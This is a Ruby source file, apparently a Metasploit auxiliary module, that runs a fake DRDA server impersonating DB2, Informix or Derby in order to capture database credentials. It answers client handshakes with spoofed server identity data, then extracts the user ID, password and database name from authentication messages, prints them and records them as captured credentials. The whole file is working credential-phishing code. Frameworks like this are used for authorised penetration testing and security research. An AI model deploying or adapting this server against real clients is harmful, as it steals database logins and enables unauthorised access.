metasploit-framework/modules/auxiliary/server/capture/drda.rb

245 lines
7.6 KiB
Ruby

# -*- coding: binary -*-
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::TcpServer
include Msf::Auxiliary::Report
class Constants
CODEPOINT_ACCSEC = 0x106d
CODEPOINT_SECCHK = 0x106e
CODEPOINT_SRVCLSNM = 0x1147
CODEPOINT_SRVCOD = 0x1149
CODEPOINT_SRVRLSLV = 0x115a
CODEPOINT_EXTNAM = 0x115e
CODEPOINT_SRVNAM = 0x116d
CODEPOINT_USERID = 0x11a0
CODEPOINT_PASSWORD = 0x11a1
CODEPOINT_SECMEC = 0x11a2
CODEPOINT_SECCHKCD = 0x11a4
CODEPOINT_SECCHKRM = 0x1219
CODEPOINT_MGRLVLLS = 0x1404
CODEPOINT_EXCSATRD = 0x1443
CODEPOINT_ACCSECRD = 0x14ac
CODEPOINT_RDBNAM = 0x2110
end
def initialize
super(
'Name' => 'Authentication Capture: DRDA (DB2, Informix, Derby)',
'Description' => %q{
This module provides a fake DRDA (DB2, Informix, Derby) server
that is designed to capture authentication credentials.
},
'Author' => 'Patrik Karlsson <patrik[at]cqure.net>',
'License' => MSF_LICENSE,
'Actions' => [ [ 'Capture' ] ],
'PassiveActions' => [ 'Capture' ],
'DefaultAction' => 'Capture'
)
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 50000 ])
], self.class)
end
def setup
super
@state = {}
end
def run
exploit()
end
def on_client_connect(c)
@state[c] = {
:name => "#{c.peerhost}:#{c.peerport}",
:ip => c.peerhost,
:port => c.peerport,
:user => nil,
:pass => nil,
:database => nil
}
end
# translates EBDIC to ASCII
def drda_ascii_to_ebdic(str)
a2e = [
"00010203372D2E2F1605250B0C0D0E0F101112133C3D322618193F271C1D1E1F" +
"405A7F7B5B6C507D4D5D5C4E6B604B61F0F1F2F3F4F5F6F7F8F97A5E4C7E6E6F" +
"7CC1C2C3C4C5C6C7C8C9D1D2D3D4D5D6D7D8D9E2E3E4E5E6E7E8E9ADE0BD5F6D" +
"79818283848586878889919293949596979899A2A3A4A5A6A7A8A9C04FD0A107" +
"202122232415061728292A2B2C090A1B30311A333435360838393A3B04143EE1" +
"4142434445464748495152535455565758596263646566676869707172737475" +
"767778808A8B8C8D8E8F909A9B9C9D9E9FA0AAABAC4AAEAFB0B1B2B3B4B5B6B7" +
"B8B9BABBBC6ABEBFCACBCCCDCECFDADBDCDDDEDFEAEBECEDEEEFFAFBFCFDFEFF"
].pack("H*")
str.unpack('C*').map {|c| a2e[c] }.pack("A"*str.length)
end
# translates ASCII to EBDIC
def drda_ebdic_to_ascii(str)
e2a = [
"000102039C09867F978D8E0B0C0D0E0F101112139D8508871819928F1C1D1E1F" +
"80818283840A171B88898A8B8C050607909116939495960498999A9B14159E1A" +
"20A0A1A2A3A4A5A6A7A8D52E3C282B7C26A9AAABACADAEAFB0B121242A293B5E" +
"2D2FB2B3B4B5B6B7B8B9E52C255F3E3FBABBBCBDBEBFC0C1C2603A2340273D22" +
"C3616263646566676869C4C5C6C7C8C9CA6A6B6C6D6E6F707172CBCCCDCECFD0" +
"D17E737475767778797AD2D3D45BD6D7D8D9DADBDCDDDEDFE0E1E2E3E45DE6E7" +
"7B414243444546474849E8E9EAEBECED7D4A4B4C4D4E4F505152EEEFF0F1F2F3" +
"5C9F535455565758595AF4F5F6F7F8F930313233343536373839FAFBFCFDFEFF"
].pack("H*")
str.unpack('C*').map {|c| e2a[c] }.pack("A"*str.length)
end
# parses and returns a DRDA parameter
def drda_parse_parameter(data)
param = {
:length => data.slice!(0,2).unpack("n")[0],
:codepoint => data.slice!(0,2).unpack("n")[0],
:data => ""
}
param[:data] = drda_ebdic_to_ascii(data.slice!(0,param[:length] - 4).unpack("A*")[0])
param
end
# creates a DRDA parameter
def drda_create_parameter(codepoint, data)
param = {
:codepoint => codepoint,
:data => drda_ascii_to_ebdic(data),
:length => data.length + 4
}
param
end
# creates a DRDA CMD with parameters and returns it as an opaque string
def drda_create_cmd(codepoint, options = { :format => 0x43, :correlid => 0x01 }, params=[])
data = ""
for p in params.each
data << [p[:length]].pack("n")
data << [p[:codepoint]].pack("n")
data << [p[:data]].pack("A*")
end
hdr = ""
hdr << [data.length + 10].pack("n")
hdr << [0xd0].pack("C") # magic
hdr << [options[:format]].pack("C") # format
hdr << [options[:correlid]].pack("n") # corellid
hdr << [data.length + 4].pack("n") # length2
hdr << [codepoint].pack("n")
data = hdr + data
data
end
# parses a response and returns an array with commands and parameters
def drda_parse_response(data)
result = []
until data.empty?
cp = {
:length => data.slice!(0, 2).unpack("n")[0],
:magic => data.slice!(0, 1).unpack("C")[0],
:format => data.slice!(0, 1).unpack("C")[0],
:corellid => data.slice!(0,2).unpack("n")[0],
:length2 => data.slice!(0,2).unpack("n")[0],
:codepoint => data.slice!(0,2).unpack("n")[0],
:params => []
}
cpdata = data.slice!(0, cp[:length] - 10)
until cpdata.empty?
cp[:params] << drda_parse_parameter(cpdata)
end
result << cp
end
result
end
# sends of a DRDA command
def drda_send_cmd(c, cmd)
data = ""
cmd.each {|d| data << d}
c.put data
end
def on_client_data(c)
data = c.get_once
return if not data
for cmd in drda_parse_response(data).each
case cmd[:codepoint]
when Constants::CODEPOINT_ACCSEC
params = []
params << drda_create_parameter(Constants::CODEPOINT_EXTNAM, "DB2 db2sysc 05D80B00%FED%Y00")
params << drda_create_parameter(Constants::CODEPOINT_MGRLVLLS, ["9d03008e847f008e1c970000840f00979d20008d9dbe0097"].pack("H*"))
params << drda_create_parameter(Constants::CODEPOINT_SRVCLSNM, "QDB2/NT64")
params << drda_create_parameter(Constants::CODEPOINT_SRVNAM, "DB2")
params << drda_create_parameter(Constants::CODEPOINT_SRVRLSLV, "SQL10010")
cmd = []
cmd << drda_create_cmd(Constants::CODEPOINT_EXCSATRD, { :format => 0x43, :correlid => 1 }, params)
params = []
params << drda_create_parameter(Constants::CODEPOINT_SECMEC, "\x00\x03")
cmd << drda_create_cmd(Constants::CODEPOINT_ACCSECRD, { :format => 3, :correlid => 2 }, params)
drda_send_cmd(c, cmd)
when Constants::CODEPOINT_SECCHK
for p in cmd[:params].each
case p[:codepoint]
when Constants::CODEPOINT_USERID
@state[c][:user] = p[:data].rstrip
when Constants::CODEPOINT_PASSWORD
@state[c][:pass] = p[:data].rstrip
when Constants::CODEPOINT_RDBNAM
@state[c][:database] = p[:data].rstrip
end
end
else
# print_status("unhandled codepoint: #{cmd[:codepoint]}")
# do nothing
end
end
if @state[c][:user] and @state[c][:pass]
print_status("DRDA LOGIN #{@state[c][:name]} Database: #{@state[c][:database]}; #{@state[c][:user]} / #{@state[c][:pass]}")
report_auth_info(
:host => @state[c][:ip],
:port => datastore['SRVPORT'],
:sname => 'db2_client',
:user => @state[c][:user],
:pass => @state[c][:pass],
:source_type => "captured",
:active => true
)
params = []
params << drda_create_parameter(Constants::CODEPOINT_SRVCOD, "\x00\x97")
params << drda_create_parameter(Constants::CODEPOINT_SECCHKCD, "\x0f")
cmd = []
cmd << drda_create_cmd(Constants::CODEPOINT_SECCHKRM, { :format => 2, :correlid => 1 }, params)
drda_send_cmd(c, cmd)
#c.close
end
end
def on_client_close(c)
@state.delete(c)
end
end